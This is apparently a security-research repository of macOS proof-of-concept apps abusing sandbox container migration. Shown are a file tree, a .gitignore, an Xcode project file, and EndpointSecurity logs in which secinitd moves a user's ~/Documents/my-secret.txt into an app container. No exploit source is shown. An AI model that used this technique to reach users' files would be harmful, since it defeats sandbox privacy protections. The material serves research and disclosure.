├── .gitignore ├── Data └── EndpointSecurity │ ├── es-event-secinitd-container-migration-open.json │ └── es-event-secinitd-rename.json ├── Projects ├── CalendarExploit.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ └── xcshareddata │ │ └── xcschemes │ │ └── CalendarExploit.xcscheme ├── CalendarExploit │ ├── App.swift │ ├── Assets.xcassets │ │ ├── AccentColor.colorset │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset │ │ │ └── Contents.json │ │ └── Contents.json │ ├── CalendarExploit.entitlements │ ├── ContentView.swift │ └── container-migration.plist ├── ContainerMigrationExploit.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ └── xcshareddata │ │ └── xcschemes │ │ └── Exploit.xcscheme ├── ContainerMigrationExploit │ ├── App.swift │ ├── AppSandbox.entitlements │ ├── Assets.xcassets │ │ ├── AccentColor.colorset │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset │ │ │ └── Contents.json │ │ └── Contents.json │ ├── ContentView.swift │ └── container-migration.plist ├── MailContactsExploit.xcodeproj │ ├── project.pbxproj │ └── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ ├── IDEWorkspaceChecks.plist │ │ └── swiftpm │ │ └── Package.resolved └── MailContactsExploit │ ├── App.swift │ ├── Assets.xcassets │ ├── AccentColor.colorset │ │ └── Contents.json │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json │ ├── ContentView.swift │ ├── MailContactsExploit.entitlements │ └── container-migration.plist ├── README.md └── Scripts └── ContainerMigrationExploitReset.sh /.gitignore: -------------------------------------------------------------------------------- 1 | # Hidden Files 2 | .* 3 | !.gitignore 4 | !.gitkeep 5 | !.github 6 | !.travis.yml 7 | 8 | # Swift 9 | /build/ 10 | /Package.resolved 11 | 12 | # Python 13 | *.pyc 14 | 15 | # Temporary Items 16 | *.tmp 17 | *.tmp.* 18 | 19 | # Virtual Environments 20 | /venv*/ 21 | 22 | # Configuration Override 23 | *.override.* 24 | 25 | # Extra Directories 26 | /Assets/ 27 | /Extra/ 28 | 29 | # Xcode 30 | xcuserdata/ 31 | *.xcscmblueprint 32 | *.xccheckout 33 | -------------------------------------------------------------------------------- /Data/EndpointSecurity/es-event-secinitd-container-migration-open.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": 7, 3 | "seq_num": 2596, 4 | "schema_version": 1, 5 | "mach_time": 872910325232, 6 | "action": { 7 | "result": { 8 | "result_type": 1, 9 | "result": { 10 | "flags": 4294967295 11 | } 12 | } 13 | }, 14 | "action_type": 1, 15 | "thread": { 16 | "thread_id": 520140 17 | }, 18 | "time": "2024-03-13T10:48:33.038386928Z", 19 | "event_type": 10, 20 | "event": { 21 | "open": { 22 | "fflag": 1, 23 | "file": { 24 | "path": "\/Users\/pvieito\/Library\/Developer\/Xcode\/DerivedData\/ContainerMigrationExploit-efrwtojjciqwrobebocsgsdafsmw\/Build\/Products\/Debug\/Exploit.app\/Contents\/Resources\/container-migration.plist", 25 | "path_truncated": false, 26 | "stat": { 27 | "st_atimespec": "2024-03-13T10:48:07.672464777Z", 28 | "st_nlink": 1, 29 | "st_rdev": 0, 30 | "st_size": 275, 31 | "st_ctimespec": "2024-03-13T10:48:04.879658733Z", 32 | "st_mode": 33188, 33 | "st_gid": 20, 34 | "st_blksize": 4096, 35 | "st_flags": 0, 36 | "st_gen": 0, 37 | "st_birthtimespec": "2024-03-13T10:48:04.879603775Z", 38 | "st_mtimespec": "2024-03-13T10:48:04.879658733Z", 39 | "st_blocks": 8, 40 | "st_uid": 501, 41 | "st_dev": 16777234, 42 | "st_ino": 275735147 43 | } 44 | } 45 | } 46 | }, 47 | "global_seq_num": 48936, 48 | "process": { 49 | "group_id": 682, 50 | "original_ppid": 1, 51 | "executable": { 52 | "path": "\/usr\/libexec\/secinitd", 53 | "path_truncated": false, 54 | "stat": { 55 | "st_mtimespec": "2024-02-29T04:05:20.000000000Z", 56 | "st_ino": 1152921500312527707, 57 | "st_uid": 0, 58 | "st_blocks": 120, 59 | "st_flags": 524320, 60 | "st_gen": 0, 61 | "st_mode": 33261, 62 | "st_size": 227344, 63 | "st_rdev": 0, 64 | "st_blksize": 4096, 65 | "st_nlink": 1, 66 | "st_birthtimespec": "2024-02-29T04:05:20.000000000Z", 67 | "st_dev": 16777234, 68 | "st_atimespec": "2024-02-29T04:05:20.000000000Z", 69 | "st_ctimespec": "2024-02-29T04:05:20.000000000Z", 70 | "st_gid": 0 71 | } 72 | }, 73 | "ppid": 1, 74 | "signing_id": "com.apple.secinitd", 75 | "start_time": "2024-03-13T00:24:44.643137Z", 76 | "is_es_client": false, 77 | "session_id": 1, 78 | "is_platform_binary": true, 79 | "audit_token": { 80 | "ruid": 501, 81 | "pid": 682, 82 | "euid": 501, 83 | "asid": 100031, 84 | "egid": 20, 85 | "pidversion": 1537, 86 | "rgid": 20, 87 | "auid": 501 88 | }, 89 | "team_id": null, 90 | "responsible_audit_token": { 91 | "ruid": 501, 92 | "euid": 501, 93 | "asid": 100031, 94 | "pidversion": 1537, 95 | "pid": 682, 96 | "rgid": 20, 97 | "egid": 20, 98 | "auid": 501 99 | }, 100 | "cdhash": "000035C26FE4D6A102685B4105AC66C224B1F884", 101 | "parent_audit_token": { 102 | "pid": 1, 103 | "egid": 0, 104 | "rgid": 0, 105 | "euid": 0, 106 | "ruid": 0, 107 | "asid": 100015, 108 | "auid": 4294967295, 109 | "pidversion": 532 110 | }, 111 | "tty": null, 112 | "codesigning_flags": 570522369 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /Data/EndpointSecurity/es-event-secinitd-rename.json: -------------------------------------------------------------------------------- 1 | { 2 | "mach_time": 799915064367, 3 | "action_type": 1, 4 | "version": 7, 5 | "seq_num": 205, 6 | "event": { 7 | "rename": { 8 | "destination": { 9 | "new_path": { 10 | "dir": { 11 | "path": "\/Users\/pvieito\/Library\/Containers\/com.pvieito.ContainerMigrationExploitApp\/Data\/Documents", 12 | "stat": { 13 | "st_size": 64, 14 | "st_blksize": 4096, 15 | "st_blocks": 0, 16 | "st_ino": 275726075, 17 | "st_mtimespec": "2024-03-13T09:57:51.281271732Z", 18 | "st_atimespec": "2024-03-13T09:57:51.281271732Z", 19 | "st_flags": 0, 20 | "st_gen": 0, 21 | "st_gid": 20, 22 | "st_nlink": 2, 23 | "st_rdev": 0, 24 | "st_uid": 501, 25 | "st_birthtimespec": "2024-03-13T09:57:51.281271732Z", 26 | "st_dev": 16777234, 27 | "st_mode": 16832, 28 | "st_ctimespec": "2024-03-13T09:57:51.281271732Z" 29 | }, 30 | "path_truncated": false 31 | }, 32 | "filename": "my-secret.txt" 33 | } 34 | }, 35 | "destination_type": 1, 36 | "source": { 37 | "path": "\/Users\/pvieito\/Documents\/my-secret.txt", 38 | "path_truncated": false, 39 | "stat": { 40 | "st_blksize": 4096, 41 | "st_birthtimespec": "2024-03-13T00:52:02.172529315Z", 42 | "st_mode": 33188, 43 | "st_uid": 501, 44 | "st_blocks": 8, 45 | "st_nlink": 1, 46 | "st_dev": 16777234, 47 | "st_gid": 20, 48 | "st_atimespec": "2024-03-13T09:57:02.270820623Z", 49 | "st_flags": 64, 50 | "st_rdev": 0, 51 | "st_ino": 274871418, 52 | "st_size": 37, 53 | "st_gen": 0, 54 | "st_ctimespec": "2024-03-13T09:57:00.565821508Z", 55 | "st_mtimespec": "2024-03-13T09:57:00.565821508Z" 56 | } 57 | } 58 | } 59 | }, 60 | "global_seq_num": 587142, 61 | "time": "2024-03-13T09:57:51.539776326Z", 62 | "thread": { 63 | "thread_id": 476948 64 | }, 65 | "action": { 66 | "result": { 67 | "result_type": 0, 68 | "result": { 69 | "auth": 0 70 | } 71 | } 72 | }, 73 | "event_type": 25, 74 | "process": { 75 | "signing_id": "com.apple.secinitd", 76 | "tty": null, 77 | "team_id": null, 78 | "group_id": 682, 79 | "start_time": "2024-03-13T00:24:44.643137Z", 80 | "responsible_audit_token": { 81 | "ruid": 501, 82 | "egid": 20, 83 | "rgid": 20, 84 | "auid": 501, 85 | "pid": 682, 86 | "pidversion": 1537, 87 | "asid": 100031, 88 | "euid": 501 89 | }, 90 | "parent_audit_token": { 91 | "asid": 100015, 92 | "pid": 1, 93 | "rgid": 0, 94 | "pidversion": 532, 95 | "egid": 0, 96 | "ruid": 0, 97 | "euid": 0, 98 | "auid": 4294967295 99 | }, 100 | "codesigning_flags": 570522369, 101 | "cdhash": "000035C26FE4D6A102685B4105AC66C224B1F884", 102 | "is_es_client": false, 103 | "session_id": 1, 104 | "audit_token": { 105 | "egid": 20, 106 | "pid": 682, 107 | "rgid": 20, 108 | "auid": 501, 109 | "ruid": 501, 110 | "euid": 501, 111 | "asid": 100031, 112 | "pidversion": 1537 113 | }, 114 | "executable": { 115 | "path": "\/usr\/libexec\/secinitd", 116 | "stat": { 117 | "st_size": 227344, 118 | "st_birthtimespec": "2024-02-29T04:05:20.000000000Z", 119 | "st_uid": 0, 120 | "st_ino": 1152921500312527707, 121 | "st_ctimespec": "2024-02-29T04:05:20.000000000Z", 122 | "st_gid": 0, 123 | "st_mtimespec": "2024-02-29T04:05:20.000000000Z", 124 | "st_gen": 0, 125 | "st_mode": 33261, 126 | "st_dev": 16777234, 127 | "st_nlink": 1, 128 | "st_atimespec": "2024-02-29T04:05:20.000000000Z", 129 | "st_blocks": 120, 130 | "st_rdev": 0, 131 | "st_blksize": 4096, 132 | "st_flags": 524320 133 | }, 134 | "path_truncated": false 135 | }, 136 | "is_platform_binary": true, 137 | "original_ppid": 1, 138 | "ppid": 1 139 | }, 140 | "schema_version": 1 141 | } 142 | -------------------------------------------------------------------------------- /Projects/CalendarExploit.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 56; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | AA6D8F742BA0D0A800C1A3C7 /* App.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F732BA0D0A800C1A3C7 /* App.swift */; }; 11 | AA6D8F762BA0D0A800C1A3C7 /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = AA6D8F752BA0D0A800C1A3C7 /* ContentView.swift */; }; 12 | AA6D8F782BA0D0AA00C1A3C7 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F772BA0D0AA00C1A3C7 /* Assets.xcassets */; }; 13 | AA6D8F812BA0D0BD00C1A3C7 /* container-migration.plist in Resources */ = {isa = PBXBuildFile; fileRef = AA6D8F802BA0D0BD00C1A3C7 /* container-migration.plist */; }; 14 | AA6D8F852BA0D45A00C1A3C7 /* SQLite in Frameworks */ = {isa = PBXBuildFile; productRef = AA6D8F842BA0D45A00C1A3C7 /* SQLite */; }; 15 | /* End PBXBuildFile section */ 16 | 17 | /* Begin PBXFileReference section */ 18 | AA6D8F712BA0D0A800C1A3C7 /* CalendarExploit.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = CalendarExploit.app; sourceTree = BUILT_PRODUCTS_DIR; }; 19 | AA6D8F732BA0D0A800C1A3C7 /* App.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = App.swift; sourceTree = ""; }; 20 | AA6D8F752BA0D0A800C1A3C7 /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; 21 | AA6D8F772BA0D0AA00C1A3C7 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 22 | AA6D8F7C2BA0D0AA00C1A3C7 /* CalendarExploit.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = CalendarExploit.entitlements; sourceTree = ""; }; 23 | AA6D8F802BA0D0BD00C1A3C7 /* container-migration.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = "container-migration.plist"; sourceTree = ""; }; 24 | /* End PBXFileReference section */ 25 | 26 | /* Begin PBXFrameworksBuildPhase section */ 27 | AA6D8F6E2BA0D0A800C1A3C7 /* Frameworks */ = { 28 | isa = PBXFrameworksBuildPhase; 29 | buildActionMask = 2147483647; 30 | files = ( 31 | AA6D8F852BA0D45A00C1A3C7 /* SQLite in Frameworks */, 32 | ); 33 | runOnlyForDeploymentPostprocessing = 0; 34 | }; 35 | /* End PBXFrameworksBuildPhase section */ 36 | 37 | /* Begin PBXGroup section */ 38 | AA6D8F392BA0842600C1A3C7 = { 39 | isa = PBXGroup; 40 | children = ( 41 | AA6D8F722BA0D0A800C1A3C7 /* CalendarExploit */, 42 | AA6D8F432BA0842600C1A3C7 /* Products */, 43 | AA6D8F832BA0D45A00C1A3C7 /* Frameworks */, 44 | ); 45 | sourceTree = ""; 46 | }; 47 | AA6D8F432BA0842600C1A3C7 /* Products */ = { 48 | isa = PBXGroup; 49 | children = ( 50 | AA6D8F712BA0D0A800C1A3C7 /* CalendarExploit.app */, 51 | ); 52 | name = Products; 53 | sourceTree = ""; 54 | }; 55 | AA6D8F722BA0D0A800C1A3C7 /* CalendarExploit */ = { 56 | isa = PBXGroup; 57 | children = ( 58 | AA6D8F732BA0D0A800C1A3C7 /* App.swift */, 59 | AA6D8F752BA0D0A800C1A3C7 /* ContentView.swift */, 60 | AA6D8F802BA0D0BD00C1A3C7 /* container-migration.plist */, 61 | AA6D8F772BA0D0AA00C1A3C7 /* Assets.xcassets */, 62 | AA6D8F7C2BA0D0AA00C1A3C7 /* CalendarExploit.entitlements */, 63 | ); 64 | path = CalendarExploit; 65 | sourceTree = ""; 66 | }; 67 | AA6D8F832BA0D45A00C1A3C7 /* Frameworks */ = { 68 | isa = PBXGroup; 69 | children = ( 70 | ); 71 | name = Frameworks; 72 | sourceTree = ""; 73 | }; 74 | /* End PBXGroup section */ 75 | 76 | /* Begin PBXNativeTarget section */ 77 | AA6D8F702BA0D0A800C1A3C7 /* CalendarExploit */ = { 78 | isa = PBXNativeTarget; 79 | buildConfigurationList = AA6D8F7F2BA0D0AA00C1A3C7 /* Build configuration list for PBXNativeTarget "CalendarExploit" */; 80 | buildPhases = ( 81 | AA6D8F6D2BA0D0A800C1A3C7 /* Sources */, 82 | AA6D8F6E2BA0D0A800C1A3C7 /* Frameworks */, 83 | AA6D8F6F2BA0D0A800C1A3C7 /* Resources */, 84 | ); 85 | buildRules = ( 86 | ); 87 | dependencies = ( 88 | ); 89 | name = CalendarExploit; 90 | packageProductDependencies = ( 91 | AA6D8F842BA0D45A00C1A3C7 /* SQLite */, 92 | ); 93 | productName = MailContactsExploit; 94 | productReference = AA6D8F712BA0D0A800C1A3C7 /* CalendarExploit.app */; 95 | productType = "com.apple.product-type.application"; 96 | }; 97 | /* End PBXNativeTarget section */ 98 | 99 | /* Begin PBXProject section */ 100 | AA6D8F3A2BA0842600C1A3C7 /* Project object */ = { 101 | isa = PBXProject; 102 | attributes = { 103 | BuildIndependentTargetsInParallel = 1; 104 | LastSwiftUpdateCheck = 1530; 105 | LastUpgradeCheck = 1530; 106 | TargetAttributes = { 107 | AA6D8F702BA0D0A800C1A3C7 = { 108 | CreatedOnToolsVersion = 15.3; 109 | }; 110 | }; 111 | }; 112 | buildConfigurationList = AA6D8F3D2BA0842600C1A3C7 /* Build configuration list for PBXProject "CalendarExploit" */; 113 | compatibilityVersion = "Xcode 14.0"; 114 | developmentRegion = en; 115 | hasScannedForEncodings = 0; 116 | knownRegions = ( 117 | en, 118 | Base, 119 | ); 120 | mainGroup = AA6D8F392BA0842600C1A3C7; 121 | packageReferences = ( 122 | AA6D8F822BA0D3A600C1A3C7 /* XCRemoteSwiftPackageReference "SQLite.swift" */, 123 | ); 124 | productRefGroup = AA6D8F432BA0842600C1A3C7 /* Products */; 125 | projectDirPath = ""; 126 | projectRoot = ""; 127 | targets = ( 128 | AA6D8F702BA0D0A800C1A3C7 /* CalendarExploit */, 129 | ); 130 | }; 131 | /* End PBXProject section */ 132 | 133 | /* Begin PBXResourcesBuildPhase section */ 134 | AA6D8F6F2BA0D0A800C1A3C7 /* Resources */ = { 135 | isa = PBXResourcesBuildPhase; 136 | buildActionMask = 2147483647; 137 | files = ( 138 | AA6D8F812BA0D0BD00C1A3C7 /* container-migration.plist in Resources */, 139 | AA6D8F782BA0D0AA00C1A3C7 /* Assets.xcassets in Resources */, 140 | ); 141 | runOnlyForDeploymentPostprocessing = 0; 142 | }; 143 | /* End PBXResourcesBuildPhase section */ 144 | 145 | /* Begin PBXSourcesBuildPhase section */ 146 | AA6D8F6D2BA0D0A800C1A3C7 /* Sources */ = { 147 | isa = PBXSourcesBuildPhase; 148 | buildActionMask = 2147483647; 149 | files = ( 150 | AA6D8F762BA0D0A800C1A3C7 /* ContentView.swift in Sources */, 151 | AA6D8F742BA0D0A800C1A3C7 /* App.swift in Sources */, 152 | ); 153 | runOnlyForDeploymentPostprocessing = 0; 154 | }; 155 | /* End PBXSourcesBuildPhase section */ 156 | 157 | /* Begin XCBuildConfiguration section */ 158 | AA6D8F4F2BA0842800C1A3C7 /* Debug */ = { 159 | isa = XCBuildConfiguration; 160 | buildSettings = { 161 | ALWAYS_SEARCH_USER_PATHS = NO; 162 | ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; 163 | CLANG_ANALYZER_NONNULL = YES; 164 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 165 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 166 | CLANG_ENABLE_MODULES = YES; 167 | CLANG_ENABLE_OBJC_ARC = YES; 168 | CLANG_ENABLE_OBJC_WEAK = YES; 169 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 170 | CLANG_WARN_BOOL_CONVERSION = YES; 171 | CLANG_WARN_COMMA = YES; 172 | CLANG_WARN_CONSTANT_CONVERSION = YES; 173 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 174 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 175 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 176 | CLANG_WARN_EMPTY_BODY = YES; 177 | CLANG_WARN_ENUM_CONVERSION = YES; 178 | CLANG_WARN_INFINITE_RECURSION = YES; 179 | CLANG_WARN_INT_CONVERSION = YES; 180 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 181 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 182 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 183 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 184 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 185 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 186 | CLANG_WARN_STRICT_PROTOTYPES = YES; 187 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 188 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 189 | CLANG_WARN_UNREACHABLE_CODE = YES; 190 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 191 | COPY_PHASE_STRIP = NO; 192 | DEBUG_INFORMATION_FORMAT = dwarf; 193 | ENABLE_STRICT_OBJC_MSGSEND = YES; 194 | ENABLE_TESTABILITY = YES; 195 | ENABLE_USER_SCRIPT_SANDBOXING = YES; 196 | GCC_C_LANGUAGE_STANDARD = gnu17; 197 | GCC_DYNAMIC_NO_PIC = NO; 198 | GCC_NO_COMMON_BLOCKS = YES; 199 | GCC_OPTIMIZATION_LEVEL = 0; 200 | GCC_PREPROCESSOR_DEFINITIONS = ( 201 | "DEBUG=1", 202 | "$(inherited)", 203 | ); 204 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 205 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 206 | GCC_WARN_UNDECLARED_SELECTOR = YES; 207 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 208 | GCC_WARN_UNUSED_FUNCTION = YES; 209 | GCC_WARN_UNUSED_VARIABLE = YES; 210 | LOCALIZATION_PREFERS_STRING_CATALOGS = YES; 211 | MACOSX_DEPLOYMENT_TARGET = 14.4; 212 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 213 | MTL_FAST_MATH = YES; 214 | ONLY_ACTIVE_ARCH = YES; 215 | SDKROOT = macosx; 216 | SWIFT_ACTIVE_COMPILATION_CONDITIONS = "DEBUG $(inherited)"; 217 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 218 | }; 219 | name = Debug; 220 | }; 221 | AA6D8F502BA0842800C1A3C7 /* Release */ = { 222 | isa = XCBuildConfiguration; 223 | buildSettings = { 224 | ALWAYS_SEARCH_USER_PATHS = NO; 225 | ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; 226 | CLANG_ANALYZER_NONNULL = YES; 227 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 228 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 229 | CLANG_ENABLE_MODULES = YES; 230 | CLANG_ENABLE_OBJC_ARC = YES; 231 | CLANG_ENABLE_OBJC_WEAK = YES; 232 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 233 | CLANG_WARN_BOOL_CONVERSION = YES; 234 | CLANG_WARN_COMMA = YES; 235 | CLANG_WARN_CONSTANT_CONVERSION = YES; 236 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 237 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 238 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 239 | CLANG_WARN_EMPTY_BODY = YES; 240 | CLANG_WARN_ENUM_CONVERSION = YES; 241 | CLANG_WARN_INFINITE_RECURSION = YES; 242 | CLANG_WARN_INT_CONVERSION = YES; 243 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 244 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 245 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 246 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 247 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 248 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 249 | CLANG_WARN_STRICT_PROTOTYPES = YES; 250 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 251 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 252 | CLANG_WARN_UNREACHABLE_CODE = YES; 253 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 254 | COPY_PHASE_STRIP = NO; 255 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 256 | ENABLE_NS_ASSERTIONS = NO; 257 | ENABLE_STRICT_OBJC_MSGSEND = YES; 258 | ENABLE_USER_SCRIPT_SANDBOXING = YES; 259 | GCC_C_LANGUAGE_STANDARD = gnu17; 260 | GCC_NO_COMMON_BLOCKS = YES; 261 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 262 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 263 | GCC_WARN_UNDECLARED_SELECTOR = YES; 264 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 265 | GCC_WARN_UNUSED_FUNCTION = YES; 266 | GCC_WARN_UNUSED_VARIABLE = YES; 267 | LOCALIZATION_PREFERS_STRING_CATALOGS = YES; 268 | MACOSX_DEPLOYMENT_TARGET = 14.4; 269 | MTL_ENABLE_DEBUG_INFO = NO; 270 | MTL_FAST_MATH = YES; 271 | SDKROOT = macosx; 272 | SWIFT_COMPILATION_MODE = wholemodule; 273 | }; 274 | name = Release; 275 | }; 276 | AA6D8F7D2BA0D0AA00C1A3C7 /* Debug */ = { 277 | isa = XCBuildConfiguration; 278 | buildSettings = { 279 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 280 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 281 | CODE_SIGN_ENTITLEMENTS = CalendarExploit/CalendarExploit.entitlements; 282 | CODE_SIGN_STYLE = Automatic; 283 | COMBINE_HIDPI_IMAGES = YES; 284 | CURRENT_PROJECT_VERSION = 1; 285 | DEVELOPMENT_TEAM = T7MC635YG5; 286 | ENABLE_HARDENED_RUNTIME = YES; 287 | ENABLE_PREVIEWS = YES; 288 | GENERATE_INFOPLIST_FILE = YES; 289 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 290 | LD_RUNPATH_SEARCH_PATHS = ( 291 | "$(inherited)", 292 | "@executable_path/../Frameworks", 293 | ); 294 | MARKETING_VERSION = 1.0; 295 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.CalendarExploit; 296 | PRODUCT_NAME = "$(TARGET_NAME)"; 297 | SWIFT_EMIT_LOC_STRINGS = YES; 298 | SWIFT_VERSION = 5.0; 299 | }; 300 | name = Debug; 301 | }; 302 | AA6D8F7E2BA0D0AA00C1A3C7 /* Release */ = { 303 | isa = XCBuildConfiguration; 304 | buildSettings = { 305 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 306 | ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; 307 | CODE_SIGN_ENTITLEMENTS = CalendarExploit/CalendarExploit.entitlements; 308 | CODE_SIGN_STYLE = Automatic; 309 | COMBINE_HIDPI_IMAGES = YES; 310 | CURRENT_PROJECT_VERSION = 1; 311 | DEVELOPMENT_TEAM = T7MC635YG5; 312 | ENABLE_HARDENED_RUNTIME = YES; 313 | ENABLE_PREVIEWS = YES; 314 | GENERATE_INFOPLIST_FILE = YES; 315 | INFOPLIST_KEY_NSHumanReadableCopyright = ""; 316 | LD_RUNPATH_SEARCH_PATHS = ( 317 | "$(inherited)", 318 | "@executable_path/../Frameworks", 319 | ); 320 | MARKETING_VERSION = 1.0; 321 | PRODUCT_BUNDLE_IDENTIFIER = com.pvieito.CalendarExploit; 322 | PRODUCT_NAME = "$(TARGET_NAME)"; 323 | SWIFT_EMIT_LOC_STRINGS = YES; 324 | SWIFT_VERSION = 5.0; 325 | }; 326 | name = Release; 327 | }; 328 | /* End XCBuildConfiguration section */ 329 | 330 | /* Begin XCConfigurationList section */ 331 | AA6D8F3D2BA0842600C1A3C7 /* Build configuration list for PBXProject "CalendarExploit" */ = { 332 | isa = XCConfigurationList; 333 | buildConfigurations = ( 334 | AA6D8F4F2BA0842800C1A3C7 /* Debug */, 335 | AA6D8F502BA0842800C1A3C7 /* Release */, 336 | ); 337 | defaultConfigurationIsVisible = 0; 338 | defaultConfigurationName = Release; 339 | }; 340 | AA6D8F7F2BA0D0AA00C1A3C7 /* Build configuration list for PBXNativeTarget "CalendarExploit" */ = { 341 | isa = XCConfigurationList; 342 | buildConfigurations = ( 343 | AA6D8F7D2BA0D0AA00C1A3C7 /* Debug */, 344 | AA6D8F7E2BA0D0AA00C1A3C7 /* Release */, 345 | ); 346 | defaultConfigurationIsVisible = 0; 347 | defaultConfigurationName = Release; 348 | }; 349 | /* End XCConfigurationList section */ 350 | 351 | /* Begin XCRemoteSwiftPackageReference section */ 352 | AA6D8F822BA0D3A600C1A3C7 /* XCRemoteSwiftPackageReference "SQLite.swift" */ = { 353 | isa = XCRemoteSwiftPackageReference; 354 | repositoryURL = "https://github.com/stephencelis/SQLite.swift.git"; 355 | requirement = { 356 | kind = upToNextMajorVersion; 357 | minimumVersion = 0.15.0; 358 | }; 359 | }; 360 | /* End XCRemoteSwiftPackageReference section */ 361 | 362 | /* Begin XCSwiftPackageProductDependency section */ 363 | AA6D8F842BA0D45A00C1A3C7 /* SQLite */ = { 364 | isa = XCSwiftPackageProductDependency; 365 | package = AA6D8F822BA0D3A600C1A3C7 /* XCRemoteSwiftPackageReference "SQLite.swift" */; 366 | productName = SQLite; 367 | }; 368 | /* End XCSwiftPackageProductDependency section */ 369 | }; 370 | rootObject = AA6D8F3A2BA0842600C1A3C7 /* Project object */; 371 | } 372 | -------------------------------------------------------------------------------- /Projects/CalendarExploit.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Projects/CalendarExploit.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Projects/CalendarExploit.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "originHash" : "96e0b2c5aa6295de957dc9d748d3b6d7a3925386507df9cee99ca8de309e3cf7", 3 | "pins" : [ 4 | { 5 | "identity" : "sqlite.swift", 6 | "kind" : "remoteSourceControl", 7 | "location" : "https://github.com/stephencelis/SQLite.swift.git", 8 | "state" : { 9 | "revision" : "e78ae0220e17525a15ac68c697a155eb7a672a8e", 10 | "version" : "0.15.0" 11 | } 12 | } 13 | ], 14 | "version" : 3 15 | } 16 | -------------------------------------------------------------------------------- /Projects/CalendarExploit.xcodeproj/xcshareddata/xcschemes/CalendarExploit.xcscheme: 